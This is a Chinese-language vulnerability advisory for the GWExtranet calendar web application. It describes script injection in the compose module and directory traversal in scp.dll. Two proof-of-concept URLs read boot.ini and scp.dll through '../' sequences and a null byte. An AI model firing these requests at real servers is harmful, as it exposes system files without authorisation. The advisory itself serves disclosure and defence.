发布日期：2007-11-21
更新日期：2007-11-22

受影响系统：

Messaging Architects GWExtranet

描述：

---

BUGTRAQ  ID: 26525

GWExtranet是一款组日程表web应用，允许用户安排各种日程。

GWExtranet的compose模块没有正确验证某些用户输入，如果用户查看了恶意的日历，就会导致注入任意HTML和脚本代码并在用户浏览器会话中执行。

GWExtranet的gwextranet/scp.dll文件中的某些操作模块（如sendto、 nbfile）没有正确验证对file和template参数的输入，允许远程攻击者通过目录遍历攻击包含本地资源的任意文件。

<*来源：Joseph.giron13 （Joseph.giron13@gmail.com）
  
  链接：http://marc.info/?l=bugtraq&m=119567887522122&w=2
        http://secunia.com/advisories/27774/
        http://marc.info/?l=bugtraq&m=119610356113304&w=2
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

http://www.example.com/gwextranet/scp.dll/sendto?user=calendar+of+events&mid=474020FA.GWEMAIL_DEPOT.SDEPO.100.167656B.1.1B00.1&template=.././../../boot.ini%00
http://www.example.com/gwextranet/scp.dll/nbfile?user=calendar%20of%20events&format=&mid=46FA2724.GWEMAIL_DEPOT.SDEPO.100.167656B.1.198E.1&folder=Calendar&altcolor=cccccc&template=gwextra&caldays=1&startday=&file=../scp.dll

建议：

---

厂商补丁：

Messaging Architects
--------------------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.gwtools.com/en/gwextranet/eval/

浏览次数：2597
严重程度：0（网友投票）